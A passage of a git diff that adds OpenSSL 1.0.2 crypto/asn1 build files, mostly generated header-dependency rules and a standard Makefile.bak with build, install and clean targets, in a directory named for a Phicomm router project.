+tasn_fre.o: ../../include/openssl/symhacks.h tasn_fre.c
+tasn_new.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_new.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_new.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_new.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_new.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_new.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_new.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_new.o: ../../include/openssl/symhacks.h tasn_new.c
+tasn_prn.o: ../../e_os.h ../../include/openssl/asn1.h
+tasn_prn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+tasn_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+tasn_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+tasn_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+tasn_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+tasn_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+tasn_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+tasn_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+tasn_prn.o: ../cryptlib.h asn1_locl.h tasn_prn.c
+tasn_typ.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_typ.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_typ.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+tasn_typ.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_typ.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_typ.o: ../../include/openssl/symhacks.h tasn_typ.c
+tasn_utl.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+tasn_utl.o: ../../include/openssl/bio.h ../../include/openssl/crypto.h
+tasn_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+tasn_utl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+tasn_utl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+tasn_utl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+tasn_utl.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+tasn_utl.o: ../../include/openssl/symhacks.h tasn_utl.c
+x_algor.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_algor.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_algor.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_algor.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_algor.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_algor.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_algor.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_algor.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_algor.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_algor.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_algor.o: x_algor.c
+x_attrib.o: ../../e_os.h ../../include/openssl/asn1.h
+x_attrib.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_attrib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_attrib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_attrib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_attrib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_attrib.o: ../../include/openssl/opensslconf.h
+x_attrib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_attrib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_attrib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_attrib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_attrib.o: ../../include/openssl/x509_vfy.h ../cryptlib.h x_attrib.c
+x_bignum.o: ../../e_os.h ../../include/openssl/asn1.h
+x_bignum.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_bignum.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x_bignum.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_bignum.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+x_bignum.o: ../../include/openssl/opensslconf.h
+x_bignum.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_bignum.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+x_bignum.o: ../../include/openssl/symhacks.h ../cryptlib.h x_bignum.c
+x_crl.o: ../../e_os.h ../../include/openssl/asn1.h
+x_crl.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_crl.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_crl.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_crl.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_crl.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_crl.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_crl.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_crl.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_crl.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_crl.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_crl.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x_crl.o: ../cryptlib.h asn1_locl.h x_crl.c
+x_exten.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_exten.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_exten.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_exten.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_exten.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_exten.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_exten.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_exten.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_exten.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_exten.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_exten.o: x_exten.c
+x_info.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+x_info.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_info.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_info.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_info.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_info.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_info.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_info.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_info.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_info.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_info.o: ../cryptlib.h x_info.c
+x_long.o: ../../e_os.h ../../include/openssl/asn1.h
+x_long.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_long.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+x_long.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_long.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+x_long.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_long.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+x_long.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_long.o: ../cryptlib.h x_long.c
+x_name.o: ../../e_os.h ../../include/openssl/asn1.h
+x_name.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_name.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_name.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_name.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_name.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_name.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_name.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_name.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_name.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_name.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_name.o: ../cryptlib.h asn1_locl.h x_name.c
+x_nx509.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+x_nx509.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+x_nx509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_nx509.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_nx509.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_nx509.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_nx509.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_nx509.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_nx509.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_nx509.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_nx509.o: x_nx509.c
+x_pkey.o: ../../e_os.h ../../include/openssl/asn1.h
+x_pkey.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+x_pkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_pkey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_pkey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_pkey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_pkey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_pkey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_pkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_pkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_pkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_pkey.o: ../cryptlib.h x_pkey.c
+x_pubkey.o: ../../e_os.h ../../include/openssl/asn1.h
+x_pubkey.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_pubkey.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_pubkey.o: ../../include/openssl/dsa.h ../../include/openssl/e_os2.h
+x_pubkey.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_pubkey.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_pubkey.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_pubkey.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_pubkey.o: ../../include/openssl/pkcs7.h ../../include/openssl/rsa.h
+x_pubkey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_pubkey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_pubkey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_pubkey.o: ../cryptlib.h asn1_locl.h x_pubkey.c
+x_req.o: ../../e_os.h ../../include/openssl/asn1.h
+x_req.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_req.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_req.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_req.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_req.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_req.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_req.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_req.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_req.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_req.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_req.o: ../cryptlib.h x_req.c
+x_sig.o: ../../e_os.h ../../include/openssl/asn1.h
+x_sig.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_sig.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_sig.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_sig.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_sig.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_sig.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_sig.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_sig.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_sig.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_sig.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_sig.o: ../cryptlib.h x_sig.c
+x_spki.o: ../../e_os.h ../../include/openssl/asn1.h
+x_spki.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_spki.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_spki.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_spki.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_spki.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_spki.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_spki.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_spki.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_spki.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_spki.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_spki.o: ../cryptlib.h x_spki.c
+x_val.o: ../../e_os.h ../../include/openssl/asn1.h
+x_val.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_val.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_val.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_val.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_val.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_val.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_val.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_val.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_val.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_val.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_val.o: ../cryptlib.h x_val.c
+x_x509.o: ../../e_os.h ../../include/openssl/asn1.h
+x_x509.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_x509.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+x_x509.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+x_x509.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+x_x509.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+x_x509.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+x_x509.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+x_x509.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+x_x509.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+x_x509.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+x_x509.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+x_x509.o: ../cryptlib.h x_x509.c
+x_x509a.o: ../../e_os.h ../../include/openssl/asn1.h
+x_x509a.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+x_x509a.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+x_x509a.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+x_x509a.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+x_x509a.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+x_x509a.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+x_x509a.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+x_x509a.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+x_x509a.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+x_x509a.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+x_x509a.o: ../cryptlib.h x_x509a.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.bak
new file mode 100644
index 0000000..7b26324
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/Makefile.bak
@@ -0,0 +1,876 @@
+#
+# OpenSSL/crypto/asn1/Makefile
+#
+
+DIR=	asn1
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	a_object.c a_bitstr.c a_utctm.c a_gentm.c a_time.c a_int.c a_octet.c \
+	a_print.c a_type.c a_set.c a_dup.c a_d2i_fp.c a_i2d_fp.c \
+	a_enum.c a_utf8.c a_sign.c a_digest.c a_verify.c a_mbstr.c a_strex.c \
+	x_algor.c x_val.c x_pubkey.c x_sig.c x_req.c x_attrib.c x_bignum.c \
+	x_long.c x_name.c x_x509.c x_x509a.c x_crl.c x_info.c x_spki.c nsseq.c \
+	x_nx509.c d2i_pu.c d2i_pr.c i2d_pu.c i2d_pr.c\
+	t_req.c t_x509.c t_x509a.c t_crl.c t_pkey.c t_spki.c t_bitst.c \
+	tasn_new.c tasn_fre.c tasn_enc.c tasn_dec.c tasn_utl.c tasn_typ.c \
+	tasn_prn.c ameth_lib.c \
+	f_int.c f_string.c n_pkey.c \
+	f_enum.c x_pkey.c a_bool.c x_exten.c bio_asn1.c bio_ndef.c asn_mime.c \
+	asn1_gen.c asn1_par.c asn1_lib.c asn1_err.c a_bytes.c a_strnid.c \
+	evp_asn1.c asn_pack.c p5_pbe.c p5_pbev2.c p8_pkey.c asn_moid.c
+LIBOBJ= a_object.o a_bitstr.o a_utctm.o a_gentm.o a_time.o a_int.o a_octet.o \
+	a_print.o a_type.o a_set.o a_dup.o a_d2i_fp.o a_i2d_fp.o \
+	a_enum.o a_utf8.o a_sign.o a_digest.o a_verify.o a_mbstr.o a_strex.o \
+	x_algor.o x_val.o x_pubkey.o x_sig.o x_req.o x_attrib.o x_bignum.o \
+	x_long.o x_name.o x_x509.o x_x509a.o x_crl.o x_info.o x_spki.o nsseq.o \
+	x_nx509.o d2i_pu.o d2i_pr.o i2d_pu.o i2d_pr.o \
+	t_req.o t_x509.o t_x509a.o t_crl.o t_pkey.o t_spki.o t_bitst.o \
+	tasn_new.o tasn_fre.o tasn_enc.o tasn_dec.o tasn_utl.o tasn_typ.o \
+	tasn_prn.o ameth_lib.o \
+	f_int.o f_string.o n_pkey.o \
+	f_enum.o x_pkey.o a_bool.o x_exten.o bio_asn1.o bio_ndef.o asn_mime.o \
+	asn1_gen.o asn1_par.o asn1_lib.o asn1_err.o a_bytes.o a_strnid.o \
+	evp_asn1.o asn_pack.o p5_pbe.o p5_pbev2.o p8_pkey.o asn_moid.o
+
+SRC= $(LIBSRC)
+
+EXHEADER=  asn1.h asn1_mac.h asn1t.h
+HEADER=	$(EXHEADER) asn1_locl.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+test:	test.c
+	cc -g -I../../include -c test.c
+	cc -g -I../../include -o test test.o -L../.. -lcrypto
+
+pk:	pk.c
+	cc -g -I../../include -c pk.c
+	cc -g -I../../include -o pk pk.o -L../.. -lcrypto
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by top Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+a_bitstr.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bitstr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_bitstr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_bitstr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_bitstr.o: ../../include/openssl/opensslconf.h
+a_bitstr.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_bitstr.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_bitstr.o: ../../include/openssl/symhacks.h ../cryptlib.h a_bitstr.c
+a_bool.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bool.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+a_bool.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_bool.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_bool.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_bool.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_bool.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_bool.o: ../../include/openssl/symhacks.h ../cryptlib.h a_bool.c
+a_bytes.o: ../../e_os.h ../../include/openssl/asn1.h
+a_bytes.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_bytes.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_bytes.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_bytes.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_bytes.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_bytes.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_bytes.o: ../cryptlib.h a_bytes.c
+a_d2i_fp.o: ../../e_os.h ../../include/openssl/asn1.h
+a_d2i_fp.o: ../../include/openssl/asn1_mac.h ../../include/openssl/bio.h
+a_d2i_fp.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_d2i_fp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_d2i_fp.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_d2i_fp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_d2i_fp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_d2i_fp.o: ../../include/openssl/symhacks.h ../cryptlib.h a_d2i_fp.c
+a_digest.o: ../../e_os.h ../../include/openssl/asn1.h
+a_digest.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_digest.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_digest.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+a_digest.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_digest.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_digest.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_digest.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+a_digest.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+a_digest.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+a_digest.o: ../../include/openssl/x509_vfy.h ../cryptlib.h a_digest.c
+a_dup.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_dup.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_dup.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_dup.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+a_dup.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_dup.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_dup.o: ../../include/openssl/symhacks.h ../cryptlib.h a_dup.c
+a_enum.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_enum.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_enum.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_enum.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_enum.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_enum.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_enum.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_enum.o: ../cryptlib.h a_enum.c
+a_gentm.o: ../../e_os.h ../../include/openssl/asn1.h
+a_gentm.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_gentm.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_gentm.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_gentm.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_gentm.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_gentm.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_gentm.o: ../cryptlib.h ../o_time.h a_gentm.c asn1_locl.h
+a_i2d_fp.o: ../../e_os.h ../../include/openssl/asn1.h
+a_i2d_fp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_i2d_fp.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_i2d_fp.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_i2d_fp.o: ../../include/openssl/opensslconf.h
+a_i2d_fp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_i2d_fp.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_i2d_fp.o: ../../include/openssl/symhacks.h ../cryptlib.h a_i2d_fp.c
+a_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+a_int.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+a_int.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_int.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_int.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_int.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_int.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_int.o: ../cryptlib.h a_int.c
+a_mbstr.o: ../../e_os.h ../../include/openssl/asn1.h
+a_mbstr.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_mbstr.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_mbstr.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+a_mbstr.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+a_mbstr.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+a_mbstr.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+a_mbstr.o: ../cryptlib.h a_mbstr.c
+a_object.o: ../../e_os.h ../../include/openssl/asn1.h
+a_object.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+a_object.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+a_object.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+a_object.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+a_object.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+a_object.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+a_object.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+a_object.o: ../../include/openssl/symhacks.h ../cryptlib.h a_object.c
+a_octet.o: ../../e_os.h ../../include/openssl/asn1.h
+a_octet.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+a_octet.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+a_octet.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
